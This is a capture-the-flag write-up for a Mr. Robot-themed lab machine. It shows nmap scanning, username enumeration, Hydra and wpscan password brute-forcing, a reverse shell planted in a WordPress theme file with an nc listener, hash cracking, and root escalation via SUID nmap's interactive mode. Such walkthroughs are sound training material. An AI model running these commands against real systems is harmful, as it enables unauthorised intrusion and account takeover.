# Write-up ### Objectives * Find the three hidden keys. * Gain initial access to the machine. * Escalate privileges to root. *** ### Reconnaissance We start by scanning for open ports with **Nmap**: ```bash nmap -Pn -sCV -F -T5 ``` The scan reveals: * **Port 22** (SSH) - *closed*. * **Port 80** (HTTP) - *open*. * **Port 443** (HTTPS) - *open*. Let's focus on **port 80** first. Browsing to `http://` brings up what looks like a puzzle or game. Time to start digging. *** ### Gaining a Shell After some exploration, we check for a `robots.txt` file: ```bash http:///robots.txt ``` Inside, we find two interesting entries: * A file called `fsocity.dic` — a **wordlist**. * The **first key**!

Given the presence of a wordlist, it hints at potential **password brute-forcing**.\ To find a target for brute-forcing, let's enumerate directories with **Dirbuster** or similar tools. Quickly, we discover this is a **WordPress** site (`wp-login.php` present). Now, let's try enumerating WordPress users with **wpscan**: ```bash wpscan --url http:// --enumerate u ``` Surprisingly, no luck. > **Observation**: When entering random credentials in the login form, it shows different error messages depending on the username — meaning **valid usernames** can be discovered this way. By trying names manually (admin, root, mrrobot, fsociety...), entering **Elliot** triggers a *different* error.

Thus, we refine our brute-force: ```bash wpscan --url http:/// --usernames Elliot --passwords fsocity.dic ``` Or using **Hydra**: ```bash hydra -l Elliot -P fsocity.dic http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username" -t 30 -VV ``` Eventually, we find the password: * **Elliot : ER\*\*\*\*\*\*\*** Now authenticated, let's log into the WordPress admin panel! Navigating to **Appearance > Theme Editor**, we find `404.php`.\ Classic move: let's replace it with a **reverse shell** payload from Pentestmonkey, adapting it with our IP and port.

Start a listener: ```bash nc -lvnp 7777 ``` Then, trigger the shell by visiting any non-existent page. Boom — **reverse shell obtained**! To upgrade the shell: ```bash python3 -c 'import pty; pty.spawn("/bin/bash")' ``` *** ### Privilege Escalation Inside the system, searching `/home/robot/`, we find the **second key** — but cannot read it yet. However, a file `password.raw-md5` is accessible.\ It contains an MD5 hash. Cracking the hash via [**CrackStation** ](https://crackstation.net/)gives the password. Switching to user **robot**: ```bash su robot ``` With this, the second key is retrieved! Now for root access. Checking binaries with the SUID bit: ```bash find / -type f -perm -04000 -ls 2>/dev/null ``` We spot **nmap** with SUID permissions! Upon checking its version (`nmap --version`), it's **3.81** — vulnerable to execution tricks. Following **GTFOBins** instructions: ```bash nmap --interactive !sh ``` Root shell achieved. Searching through the filesystem, the **third and final key** is found. Mission accomplished! *** ### Result First key: Found via `robots.txt`\ Second key: Found under `/home/robot/` after switching user\ Third key: Found after privilege escalation using vulnerable SUID `nmap`